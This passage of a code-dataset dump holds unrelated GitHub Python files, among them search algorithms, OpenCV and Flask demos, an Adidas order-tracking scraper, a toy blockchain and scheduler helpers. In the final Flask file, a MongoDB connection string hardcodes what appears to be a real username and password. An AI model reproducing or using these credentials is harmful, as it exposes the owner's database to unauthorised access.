create_engine(f\"mysql+mysqldb://{usr}:{pwd}@localhost/{db_}\")\n\n session = Session(engine)\n\n state = session.query(State).first()\n\n if state:\n print(f\"1: {state.name}\")\n else:\n print(\"Nothing\")\n\n session.close()\n","repo_name":"adaptingadapting/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/8-model_state_fetch_first.py","file_name":"8-model_state_fetch_first.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74790343603","text":"import util\n\n\ndef depthFirstSearch(problem):\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n\n class SearchNode:\n \"\"\"\n Creates node: \n \"\"\"\n\n def __init__(self, state, action=None, parent=None):\n self.state = state\n self.action = action\n self.parent = parent\n\n def extract_solution(self):\n \"\"\"Gets complete path from goal state to parent node\"\"\"\n action_path = []\n search_node = self\n while search_node:\n if search_node.action:\n action_path.append(search_node.action)\n search_node = search_node.parent\n return list(reversed(action_path))\n\n start_node = SearchNode(problem.getStartState())\n\n if problem.isGoalState(start_node.state):\n return start_node.extract_solution()\n\n frontier = util.Stack()\n explored = set()\n frontier.push(start_node)\n\n # run until stack is empty\n while not frontier.isEmpty():\n node = frontier.pop() # choose the deepest node in frontier\n explored.add(node.state)\n\n if problem.isGoalState(node.state):\n return node.extract_solution()\n\n # expand node\n successors = problem.getSuccessors(node.state)\n\n for succ in successors:\n # make-child-node\n child_node = SearchNode(succ[0], succ[1], node)\n if child_node.state not in explored:\n frontier.push(child_node)\n\n # no solution\n util.raiseNotDefined()\n","repo_name":"lucassoni/ia","sub_path":"proj1/tinyMazeSearch.py","file_name":"tinyMazeSearch.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14101979857","text":"import cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\ncanvas = np.zeros((512,512,3), dtype=np.uint8) # siyah tuval oluşturuyoruz\n\ncv2.namedWindow(\"image\") #pencere adımız\n\ncv2.createTrackbar(\"R\",\"image\",0,255,nothing)\ncv2.createTrackbar(\"G\",\"image\",0,255,nothing)\ncv2.createTrackbar(\"B\",\"image\",0,255,nothing) #tuvaller için kızakları olan trackbarlar oluşturuyoruz\ncv2.createTrackbar(\"Switch\",\"image\",0,1,nothing)\n\nwhile True:\n cv2.imshow(\"image\", canvas) # penceriyi görmemizi sağlar\n if cv2.waitKey(1) & 0xFF == ord(\"q\"): # klavyeden q harfine basılınca kapanmasını sağlar\n break\n s =cv2.getTrackbarPos(\"Switch\",\"image\")\n r=cv2.getTrackbarPos(\"R\",\"image\") #trackbarın içindeki kızağın pozisyonunu çekmek için\n g = cv2.getTrackbarPos(\"G\", \"image\")\n b = cv2.getTrackbarPos(\"B\", \"image\")\n\n if s==1 : #switch 1 ise kızaklarıdaki değişikler 
okunur\n canvas[:]=[b,g,r] #kızaklardaki alınan değerleri r g b değerlerine atamasını sağlar\n else :\n canvas[:] = [0, 0, 0]\n","repo_name":"curavite/Trackbar_applications01","sub_path":"deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"45974439554","text":"from bz2file import BZ2File\nfrom wiktionary_de_parser import Parser\nimport json\nimport sys\n\nf = open(\"wiktionary-lookupable.txt\", \"r\")\nrecords = json.loads(f.read())\nf.close()\n\nw = sys.argv[1]\nftype = sys.argv[2]\n\nflexion = set()\n\ndef lookup(c):\n if ftype == \"verb\" and 'Präsens_ich' in c['flexion']:\n for k in c['flexion']:\n if k != 'Hilfsverb':\n flexion.add(c['flexion'][k])\n elif ftype == \"adj\" and 'Komparativ' in c['flexion']:\n for k in c['flexion']:\n flexion.add(c['flexion'][k])\n\nfor c in records[w]:\n if 'flexion' not in c:\n if 'lemma' in c:\n w2 = c['lemma']\n for c2 in records[w2]:\n if 'flexion' in c2:\n lookup(c2)\n else:\n lookup(c)\n\nfor s in flexion:\n print(s)\n","repo_name":"murliwatz/2021-emotion-detection-from-german-texts","sub_path":"misc-scripts/extractors/wiktionary-extract-flexion.py","file_name":"wiktionary-extract-flexion.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34666838940","text":"import unittest\nfrom main import create_app, db\nfrom models.Profiles import Profiles\n\nclass TestProfiles(unittest.TestCase):\n @classmethod\n def setUp(cls):\n cls.app = create_app()\n cls.app_context = cls.app.app_context()\n cls.app_context.push()\n cls.client = cls.app.test_client()\n db.create_all()\n runner = cls.app.test_cli_runner()\n runner.invoke(args=[\"db\", \"seed\"])\n\n @classmethod\n def tearDown(cls):\n db.session.remove()\n db.drop_all()\n cls.app_context.pop()\n\n\n\n\n def test_profiles_index(self):\n response= self.client.get(\"/profiles/\")\n\n data = response.get_json()\n\n self.assertEqual(response.status_code, 200)\n self.assertIsInstance(data, list)\n\n def test_profiles_create(self):\n response = self.client.post(\"/profiles/\", json={\n \"email\": \"Test Email\",\n \"fname\": \"Test Name\",\n \"github\": \"Test Github\",\n \"lname\": \"Test Name\",\n \"profile_pic\":\"Test Profile Pic\",\n \"username\": \"Test UserName\",\n \"userpass\":\"Test Password\",\n \"account_active\":\"True\"\n })\n\n data = response.get_json()\n\n self.assertEqual(response.status_code, 200)\n\n self.assertIsInstance(data, dict)\n self.assertTrue(bool(\"userid\" in data.keys()))\n\n profiles = Profiles.query.get(data[\"userid\"])\n self.assertIsNotNone(profiles)\n\n def test_profiles_delete(self):\n profiles = Profiles.query.first()\n\n response = self.client.delete(f\"/profiles/{profiles.userid}\")\n data = response.get_json()\n\n self.assertEqual(response.status_code, 200)\n\n profiles = Profiles.query.get(profiles.userid)\n self.assertIsNone(profiles)","repo_name":"Karen-Stewart80/Code-Connect-Collaborate","sub_path":"src/tests/test_profiles.py","file_name":"test_profiles.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71235554803","text":"from erp5.component.module.Log import log\nlog('Launching activities to setup the demo configuration!')\n\nkw = {}\ninstalled_business_template_list = 
context.portal_templates.getInstalledBusinessTemplateTitleList()\n\nif 'erp5_configurator_standard' not in installed_business_template_list:\n  kw = context.Alarm_installBusinessTemplateList()\n\nlog('Finished to launch the activities to setup the demo configuration!')\ncontext.setEnabled(False)\n","repo_name":"Nexedi/erp5","sub_path":"bt5/erp5_demo_smb/SkinTemplateItem/portal_skins/erp5_demo_smb/Alarm_setupDemoConfiguration.py","file_name":"Alarm_setupDemoConfiguration.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"75"} +{"seq_id":"34242407979","text":"from libtiff import TIFF\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n# read the nighttime light data\r\ntif = TIFF.open('F182013.v4c.avg_lights_x_pct\\F182013.v4c.avg_lights_x_pct.tif', mode='r')\r\nimg = tif.read_image()\r\nheight = img.shape[0]\r\nwidth = img.shape[1]\r\n# plt.imshow(img)\r\n# plt.show()\r\n# extract the nighttime light data covering eastern China and plot it\r\n# the night-light data covers -65~75 N in latitude and -180~180 in longitude, with a resolution of 30'\r\nlons = 100\r\nlone = 137\r\nlats = -15\r\nlate = 15\r\nlons_grid = int((lons+180) / (30.0 / 3600))\r\nlone_grid = int((lone+180) / (30.0 / 3600))\r\nlats_grid = int((70 + lats) / (30.0 / 3600))\r\nlate_grid = int((70 + late) / (30.0 / 3600))\r\nprint(lats_grid,late_grid, lons_grid,lone_grid)\r\nprint(lats_grid*(30.0 / 3600),late_grid*(30.0 / 3600), lons_grid*(30.0 / 3600),lone_grid*(30.0 / 3600))\r\nimg2 = img[lats_grid:late_grid, lons_grid:lone_grid]\r\nplt.imshow(img2)\r\nplt.show()","repo_name":"SmartImagingLab/Observation-Simulator-and-RL-algorithms","sub_path":"map/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29789917361","text":"import cv2\nimport pyautogui\nimport threading\nimport optionWindow\nimport win32api, win32con\nimport time\n\n\nclass Mouse:\n    def __init__(self, face_mouse_detector, left_click_sens=0.96, right_click_sens=0.96,\n                 mouse_vertical_sens=-100, mouse_horizontal_sens=40,\n                 nose_vertical_pos=+0.00, nose_horizontal_pos=0,\n                 idle_movement_range=0.035, acceleration_effect=1.5):\n        self.cap = cv2.VideoCapture(1)\n        self.faceMouseDetector = face_mouse_detector\n        self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, 480)\n        self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 360)\n\n        self.left_click_sensitivity = left_click_sens\n        self.right_click_sensitivity = right_click_sens\n        self.mouse_vertical_sensitivity = mouse_vertical_sens\n        self.mouse_horizontal_sensitivity = mouse_horizontal_sens\n        self.nose_horizontal_pos = nose_horizontal_pos\n        self.nose_vertical_pos = nose_vertical_pos\n        self.idle_movement_range = idle_movement_range\n        self.acceleration_effect = acceleration_effect\n\n        self.vertical_velocity = 0.0\n        self.horizontal_velocity = 0.0\n\n        self.window = optionWindow.OptionWindow(self)\n\n        self.shouldWork = True\n        pyautogui.FAILSAFE = False\n\n    def camera_read_and_analyse(self):\n        ret, frame = self.cap.read()\n        if ret:\n            frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n            self.window.update_camera(frame)\n            return self.faceMouseDetector.detect(frame)\n\n    def run(self):\n        mover = threading.Thread(target=self.mouse_movement)\n        mover.start()\n        while self.shouldWork:\n            ans = self.camera_read_and_analyse()\n            if ans is None:\n                continue\n            blink, move = ans\n            if blink[0] > self.left_click_sensitivity:\n                # pyautogui.click()\n                win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0)\n                time.sleep(0.02)\n                win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 
0)\n self.window.click_left()\n if blink[1] > self.right_click_sensitivity:\n pyautogui.click(button='right')\n self.window.click_right()\n\n if abs(move[0]) > self.idle_movement_range:\n self.horizontal_velocity = self.mouse_horizontal_sensitivity * (move[0] - self.nose_horizontal_pos)\n self.horizontal_velocity *= abs(self.horizontal_velocity) ** self.acceleration_effect\n # This creates square relation between movement of the face and velocity of the cursor - helps\n else:\n self.horizontal_velocity = 0\n if abs(move[1]) > self.idle_movement_range:\n self.vertical_velocity = self.mouse_vertical_sensitivity * (move[1] - self.nose_vertical_pos)\n self.vertical_velocity *= abs(self.vertical_velocity) ** self.acceleration_effect\n # This creates square relation between movement of the face and velocity of the cursor - helps\n else:\n self.vertical_velocity = 0\n\n self.kill(mover)\n self.window.exit_window()\n\n def mouse_movement(self):\n start_time = cv2.getTickCount()\n end_time = cv2.getTickCount()\n while self.shouldWork:\n delta_time = (end_time - start_time) / cv2.getTickFrequency()\n start_time = cv2.getTickCount()\n pyautogui.move(int(self.horizontal_velocity * delta_time), int(self.vertical_velocity * delta_time))\n end_time = cv2.getTickCount()\n\n def kill(self, mover):\n self.cap.release()\n cv2.destroyAllWindows()\n mover.join()\n\n #################################\n ############ Setters ############\n #################################\n\n '''left_click_sens = 0.96, right_click_sens = 0.96,\n mouse_vertical_sens = -100, mouse_horizontal_sens = 40,\n nose_vertical_pos = +0.00, nose_horizontal_pos = 0,\n idle_movement_range = 0.035, acceleration_effect = 1.5'''\n\n def set_left_click_sens(self, val):\n self.left_click_sensitivity = val\n\n def set_right_click_sens(self, val):\n self.right_click_sensitivity = val\n\n def set_mouse_vertical_sens(self, val):\n self.mouse_vertical_sensitivity = val\n\n def set_mouse_horizontal_sens(self, val):\n self.mouse_horizontal_sensitivity = val\n\n def set_nose_vertical_pos(self, val):\n self.nose_vertical_pos = val\n\n def set_nose_horizontal_pos(self, val):\n self.nose_horizontal_pos = val\n\n def set_idle_movement_range(self, val):\n self.idle_movement_range = val\n\n def set_acceleration_effect(self, val):\n self.acceleration_effect = val\n","repo_name":"triggeredtrebuchet/face_mouse","sub_path":"faceMouse/faceMouse.py","file_name":"faceMouse.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36341745999","text":"import os\nfrom schematics.transforms import export_loop, whitelist\nimport csv, os\n\n\nclass RolesFromCsv(dict):\n def __init__(self, path, relative_to=__file__):\n super(RolesFromCsv, self).__init__(())\n self.base_dir = os.path.dirname(os.path.abspath(relative_to))\n with open(os.path.join(self.base_dir, path)) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n self[row[\"rolename\"]] = whitelist(*[k for k in row if k != \"rolename\" and row[k]])\n","repo_name":"ProzorroUKR/openprocurement.api","sub_path":"src/openprocurement/api/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"75"} +{"seq_id":"69917179444","text":"import operator\nfrom copy import deepcopy\nfrom typing import Callable, Any\n\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\n\nclass 
QueryList(list):\n \"\"\"A list that you can filter like a Django QuerySet\"\"\"\n\n # registry of double-underscore method names and the functions they map to\n operations = (\n (\"lt\", operator.lt),\n (\"lte\", operator.le),\n (\"gt\", operator.gt),\n (\"gte\", operator.ge),\n (\"contains\", operator.contains),\n (\"in\", lambda a, b: a in b),\n (\"len\", lambda a, b: len(a) == b),\n )\n\n # functions (mostly builtins) that can get some value of an item.\n attribute_getters = (\n (\"len\", len),\n (\"bool\", bool),\n (\"max\", max),\n (\"min\", min),\n (\"all\", all),\n (\"any\", any),\n (\"abs\", abs),\n (\"sum\", sum),\n )\n\n def all(self) -> list:\n return list(deepcopy(self))\n\n def exists(self) -> bool:\n return bool(self)\n\n def first(self) -> Any:\n return self[0] if self.exists() else None\n\n def last(self) -> Any:\n return self[-1] if self.exists() else None\n\n def count(self) -> int:\n return len(self)\n\n def filter(self, **kwargs) -> \"QueryList\":\n func = lambda item: self._match_item(item, **kwargs)\n return self.__class__(filter(func, self))\n\n def exclude(self, **kwargs) -> \"QueryList\":\n func = lambda item: not self._match_item(item, **kwargs)\n return self.__class__(filter(func, self))\n\n def get(self, **kwargs) -> Any:\n qs = self.filter(**kwargs)\n if len(qs) == 0:\n raise ObjectDoesNotExist\n if len(qs) > 1:\n raise MultipleObjectsReturned\n return qs[0]\n\n def order_by(self, *fields: str) -> \"QueryList\":\n class comparer:\n \"\"\"\n Thin wrapper around an item that allows us to reverse the sorting on a per-field\n basis. Credit to black panda:\n https://stackoverflow.com/questions/37693373/how-to-sort-a-list-with-two-keys-but-one-in-reverse-order\n \"\"\"\n\n def __init__(self, value: Any, reverse: bool):\n self.value = value\n self.reverse = reverse\n\n def __eq__(self, other):\n return other.value == self.value\n\n def __lt__(self, other):\n if self.reverse:\n return other.value < self.value\n else:\n return self.value < other.value\n\n def comparison_func(item):\n \"\"\"Returns a tuple of attributes of the item which `sorted` will use to compare it\n against its peers\"\"\"\n return tuple(\n comparer(\n self._recursive_get_attribute(item, field.lstrip(\"-\")),\n reverse=field.startswith(\"-\"),\n )\n for field in fields\n )\n\n return self.__class__(sorted(self, key=comparison_func))\n\n @classmethod\n def register_operation(cls, name: str, function: Callable):\n \"\"\"\n Register a new operation that can be triggered with a dunder query parameter. 
Name should\n be the name of the operation after the \"__\".\n\n So if you want to be able to do .filter(name__islongerthan=5), you should do:\n\n def is_longer_than(item, target_length):\n return len(item) > target_length\n\n QuerySet.register(\"islongerthan\", is_longer_than)\n \"\"\"\n cls.operations += ((name, function),)\n\n @classmethod\n def register_attribute_getter(cls, name: str, function: Callable):\n cls.attribute_getters += ((name, function),)\n\n @classmethod\n def _match_item(cls, item: Any, **search_terms) -> bool:\n \"\"\"\n The search_terms are the search terms given to filter/exclude/get.\n The item is one of the items in the QueryList.\n This function decides whether the item matches the search terms.\n \"\"\"\n for query, value in search_terms.items():\n key, operation = cls._map_operation(query)\n attribute = cls._recursive_get_attribute(item, key)\n if not operation(attribute, value):\n return False\n return True\n\n @classmethod\n def _get_attribute(cls, item: Any, attribute: str) -> Any:\n \"\"\"Get the value off an item with either [\"dict key lookup\"] or .dot_lookup\"\"\"\n return item[attribute] if isinstance(item, dict) else getattr(item, attribute)\n\n @classmethod\n def _recursive_get_attribute(cls, item: Any, query: str) -> Any:\n attributes = query.split(\"__\")\n for attribute in attributes:\n if attribute in dict(cls.attribute_getters):\n func = dict(cls.attribute_getters)[attribute]\n item = func(item)\n else:\n item = cls._get_attribute(item, attribute)\n return item\n\n @classmethod\n def _map_operation(cls, query: str) -> tuple[str, Callable]:\n \"\"\"\n Fetch the key (parameter name) and operation (a function) given a query parameter.\n\n The default operator is equality (=)\n E.g. if query=\"name\" -> key=\"name\", operator=operator.eq\n\n If the query contains dunders (__) we attempt to fetch the relevant operation from the\n class' operations registry.\n E.g. 
if query=\"name__contains\" -> key=\"name\", operation=operator.contains\n \"\"\"\n # defaults\n operation = operator.eq\n key = query\n\n if \"__\" in query:\n first_parts, dunder_operation = query.rsplit(\"__\", maxsplit=1)\n operations = dict(cls.operations)\n if dunder_operation in operations:\n operation = operations[dunder_operation]\n key = first_parts\n return key, operation\n","repo_name":"binnev/redbreast","sub_path":"redbreast/querylist.py","file_name":"querylist.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40096695402","text":"import requests, json\nfrom bs4 import BeautifulSoup as bs\n\n\ndef orderchecker(ordernum, email):\n s = requests.Session()\n s.headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'\n res = s.get('https://www.adidas.com/us/order-tracker')\n soup = bs(res.text, 'lxml')\n posturl = soup.find('form', {'id':'dwfrm_ordersignup'})['action']\n payload = {\n 'dwfrm_ordersignup_orderNo' : ordernum.upper(),\n 'dwfrm_ordersignup_email' : email,\n 'dwfrm_ordersignup_signup' : 'Track order'\n }\n res = s.post(posturl, data = payload)\n soup = bs(res.text, 'lxml')\n temp = soup.find('div', {'class':'order-step selected'}).find('div', {'class':'order-step-indicator'}).text\n if '2' in temp:\n orderstatus = 'Order Confirmed'\n trackingnum = 'N/A'\n elif '3' in temp:\n orderstatus = 'Shipped'\n for item in soup.find_all('span', {'class':'order-deliveries-date'}):\n if 'Tracking number' in item.text:\n trackingnum = item.text.replace('Tracking number: ', '')\n product = soup.find('div', {'class':'product'})['data-id']\n return({'Status' : orderstatus, 'Tracking' : trackingnum, 'Product': product})\n\ndef jsonripper():\n try:\n with open('orders.json', 'r') as f:\n data = json.loads(f.read())\n s = input('Add More Orders? 
(Y/N) : ').lower()\n if s == 'y':\n while True:\n ordernum = input('Enter Order Number (Enter \"Done\" when done adding orders) : ')\n if ordernum.lower() == 'done':\n break\n email = input('Enter Email for Above Order : ')\n data['Orders'].append({\"Order Number\" : ordernum, \"Email\" : email})\n with open('orders.json', 'w') as f:\n json.dump(data, f)\n print('Orders Saved for Next Check!')\n else:\n pass\n except:\n data = {}\n data[\"Orders\"] = []\n while True:\n ordernum = input('Enter Order Number (Enter \"Done\" when done adding orders) : ')\n if ordernum.lower() == 'done':\n break\n email = input('Enter Email for Above Order : ')\n data['Orders'].append({\"Order Number\" : ordernum, \"Email\" : email})\n with open('orders.json', 'w') as f:\n json.dump(data, f)\n print('Orders Saved for Next Check!')\n for item in data['Orders']:\n try:\n status = orderchecker(item['Order Number'], item['Email'])\n print('[{}] [{}] [Tracking : {}]'.format(status['Status'], status['Product'], status['Tracking']))\n except:\n print('Error in Item : ' + str(item))\n\njsonripper()\n","repo_name":"Cosmo3904/AdidasOrderChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"81783247","text":"def multiply(m, n):\n \"\"\" Takes two positive integers and returns their product using recursion.\n >>> multiply(5, 3)\n 15\n \"\"\"\n if n == 1:\n return m\n else:\n return m + multiply(m, n - 1)\n\n\ndef is_prime(n):\n \"\"\"Returns True if n is a prime number and False otherwise.\n\n >>> is_prime(2)\n True\n >>> is_prime(16)\n False\n >>> is_prime(521)\n True\n \"\"\"\n if n == 1:\n return False\n elif n == 2:\n return True\n else:\n k = 2\n def prime_helper(n, k):\n if k == n:\n return True\n elif n % k == 0:\n return False\n else:\n return prime_helper(n, k + 1)\n return prime_helper(n, k)\n\n\ndef hailstone(n):\n \"\"\"Print out the hailstone sequence starting at n, and return the number of elements in the sequence.\n >>> a = hailstone(10)\n 10\n 5\n 16\n 8\n 4\n 2\n 1\n >>> a\n 7\n \"\"\"\n steps = 1\n def helper(n, steps):\n print(n)\n if n == 1:\n return steps\n else:\n if n % 2 == 0:\n n = n // 2\n else:\n n = n * 3 + 1 \n return helper(n, steps + 1)\n return helper(n, steps)\n\ndef merge(n1, n2):\n \"\"\" Merges two numbers by digit in decreasing order\n >>> merge(31, 42)\n 4321\n >>> merge(21, 0)\n 21\n >>> merge (21, 31) \n 3211\n \"\"\"\n # def get_last(n):\n # return n % 10\n\n # res = 0\n # step = 0\n # def helper(n1, n2, res, step):\n # if n1 == 0 and n2 == 0:\n # return res \n # else: \n # if n1 == 0 or n2 == 0:\n # min_n, max_n = min(n1, n2), max(n1, n2)\n # last = get_last(max_n)\n # max_n = max_n // 10\n # res = last * 10**step + res\n # return helper(min_n, max_n, res, step+1)\n # else:\n # last1, last2 = get_last(n1), get_last(n2)\n # if last1 <= last2:\n # last = last1\n # n1 = n1 // 10\n # else:\n # last = last2\n # n2 = n2 // 10\n # res = last * 10**step + res\n # return helper(n1, n2, res, step+1)\n\n # return helper(n1, n2, res, step)\n if n1 == 0:\n return n2\n elif n2 == 0:\n return n1\n elif n1 % 10 <= n2 % 10:\n return merge(n1 // 10, n2) * 10 + n1 % 10\n else:\n return merge(n1, n2 // 10) * 10 + n2 % 10\n","repo_name":"zhanglinfengcs/CS61A","sub_path":"disc/disc03/disc03.py","file_name":"disc03.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} 
+{"seq_id":"32724596999","text":"'''每个区块链都包含时间、自己的哈希值、上一区块的哈希值、难度、随机值、交易数据\n每个区块的哈希值=计算(一系列的值+上一区块的哈希值)\n'''\n\nimport time #获取目前的时间\nimport hashlib\nimport json\n\nclass Block():\n\n def __init__(self, msg , previous_hash):\n self.time_stamp = time.asctime(time.localtime(time.time()))#获取这个区块产生的时间\n self.previous_hash = previous_hash#获取上一个区块的哈希值\n self.msg = msg#我们的信息\n self.nonce = 1\n self.hash =self.get_hash()#自己的哈希值\n\n def get_hash(self):#计算哈希值的功能\n data = self.time_stamp +self.msg +self.previous_hash + str(self.nonce)#将各种信息相加\n hash256 = hashlib.sha256()\n hash256.update(data.encode('gb2312'))#计算这个哈希值\n return hash256.hexdigest()\n\n def mine(self, diffculty):\n target =''\n for each_num in range(0,diffculty):\n target = target +'0'\n while(int(self.hash[0:diffculty] != target)):\n self.nonce = self.nonce + 1\n self.hash= self.get_hash()\n print('Mined a new block')\n\nclass EduChain():\n\n def __init__(self, diffculty):#初始化区块链\n self.list = [] #创建一个空列表\n self.diffculty = diffculty\n def add_block(self , block):#添加区块\n block.mine(self.diffculty)\n self.list.append(block)\n\n def show(self):#打印所有区块\n json_res = json.dumps(self.list, default=self.block_dict)\n print(json_res)\n def block_dict(self , block):\n return block.__dict__\n\n def isChainValid(self):\n for i in range(1, len(self.list)):\n current_block = self.list[i]\n previous_block = self.list[i-1]\n if(current_block.hash != current_block.get_hash()):\n print('Current Block is not equal')\n return False\n if(current_block.previous_hash != previous_block.hash):\n print('Previous hash is not equal')\n return False\n print('All the blocks are correct')\n return True\n\nc = EduChain(3)\nc.add_block(Block('first', '0'))\nc.add_block(Block('second', c.list[len(c.list)-1].hash))\nc.show()\nc.isChainValid()\n","repo_name":"houxiangying/mhc","sub_path":"EduChain.py","file_name":"EduChain.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71637651761","text":"import pandas as pd\nfrom sqlalchemy import create_engine\n\ndef makeFileIntoSQL(filename, sqlName, sqlEngine):\n chunksize = 20000\n j = 0\n index_start = 1\n for df in pd.read_csv(filename, chunksize=chunksize, iterator=True, encoding='utf-8'):\n df = df.rename(columns={c: c.replace(' ', '') for c in df.columns}) # Remove spaces from columns\n df.index += index_start\n df.to_sql(sqlName, sqlEngine, if_exists='append') ##change to if_exists='replace' if you don't want to replace the database file\n index_start = df.index[-1] + 1\n\ndisk_engine = create_engine('sqlite:///awesome.db')\nmakeFileIntoSQL('uscities.csv', 'data', disk_engine)\n\ndata = pd.read_sql_query('SELECT city,city_ascii,state_id,state_name,population FROM data', disk_engine)\nprint(data) ","repo_name":"msiddiq1400/Task_Python","sub_path":"python_db_convert.py","file_name":"python_db_convert.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2323664298","text":"from create_images.Application import Application\nfrom PyQt5.QtWidgets import QApplication\nimport sys\n\n\ndef main():\n qapp = QApplication(sys.argv)\n app = Application()\n app.show()\n\n sys.exit(qapp.exec_())\n\n\nif __name__ == \"__main__\":\n 
main()","repo_name":"DavidTelenko/BingImageCreatorView_v1","sub_path":"create_images/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28325909153","text":"\nfrom settings import Setting\nfrom apscheduler.triggers.interval import IntervalTrigger\nfrom apscheduler.triggers.cron import CronTrigger\nfrom apscheduler.triggers.date import DateTrigger\n\n'''\n计划任务管理器需要使用到的公共函数。\n'''\n\ndef trigger_to_dict(trigger):\n '''\n 将触发器对象转换为字典对象。\n '''\n if type(trigger) is CronTrigger:\n return {\n 'type': 'cron',\n 'start_date': trigger.start_date.strftime(Setting.DATETIME_FORMAT) if trigger.start_date else None,\n 'end_date': trigger.end_date.strftime(Setting.DATETIME_FORMAT) if trigger.end_date else None,\n 'fields': {field.name: str(field) for field in trigger.fields}\n }\n elif type(trigger) is IntervalTrigger:\n return {\n 'type': 'interval',\n 'start_date': trigger.start_date.strftime(Setting.DATETIME_FORMAT) if trigger.start_date else None,\n 'end_date': trigger.end_date.strftime(Setting.DATETIME_FORMAT) if trigger.end_date else None,\n 'interval': trigger.interval_length\n }\n\n elif type(trigger) is DateTrigger:\n return {\n 'type': 'date',\n 'run_date': trigger.run_date.strftime(Setting.DATETIME_FORMAT)\n }\n else:\n return {\n 'type': trigger.__module__\n }\n\n\ndef job_to_dict(job):\n '''\n 将任务对象转换为字典对象\n '''\n return {\n 'id': job.id,\n 'name': job.name,\n 'func': get_job_func_name(job),\n 'args': job.args,\n 'kwargs': job.kwargs,\n 'pending': job.pending,\n 'trigger': trigger_to_dict(job.trigger),\n 'next_run_time': job.next_run_time.strftime(Setting.DATETIME_FORMAT) if job.next_run_time else None,\n 'misfire_grace_time': job.misfire_grace_time,\n 'coalesce': job.coalesce,\n 'max_instances': job.max_instances\n }\n\n\ndef get_job_func_name(job):\n '''\n 获取任务对象的运行函数名字,省略了任务模块前缀。\n '''\n if job.func_ref.startswith(Setting.SCHEDULER_JOBS_PATH):\n return job.func_ref[(len(Setting.SCHEDULER_JOBS_PATH)+1):]\n else:\n return job.func_ref\n\n\ndef get_job_trigger_type(job):\n '''\n 获取任务对象的触发器类型,返回值为 str 类型。\n '''\n trigger = job.trigger\n name = trigger.__module__\n if type(trigger) is CronTrigger:\n name = 'cron'\n elif type(trigger) is IntervalTrigger:\n name = 'interval'\n elif type(trigger) is DateTrigger:\n name = 'date'\n return name\n","repo_name":"helscn/flask-crm","sub_path":"backend/schedulers/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5028443078","text":"from flask import Flask, render_template, Response, request, redirect, url_for\r\nimport pymongo\r\nimport base64\r\nfrom pymongo import MongoClient\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/forward/\", methods=['POST'])\r\ndef move_forward():\r\n cluster =MongoClient(\"mongodb+srv://himanshu7:hatekube000@cluster0-umtto.mongodb.net/test?retryWrites=true&w=majority\")\r\n db = cluster[\"resume\"]\r\n collection = db[\"coll_resume\"]\r\n\r\n with open(r\"C:\\Users\\HimanshuKholiya\\Downloads\\GITresume\\GITresume\\Resume\\spandana.pdf\", \"rb\") as pdf_file:\r\n encoded_string = base64.b64encode(pdf_file.read())\r\n\r\n abc=db.coll_resume.insert_one({\"image\":encoded_string})\r\n forward_message = \"File Upload Successful\"\r\n return render_template('index.html', 
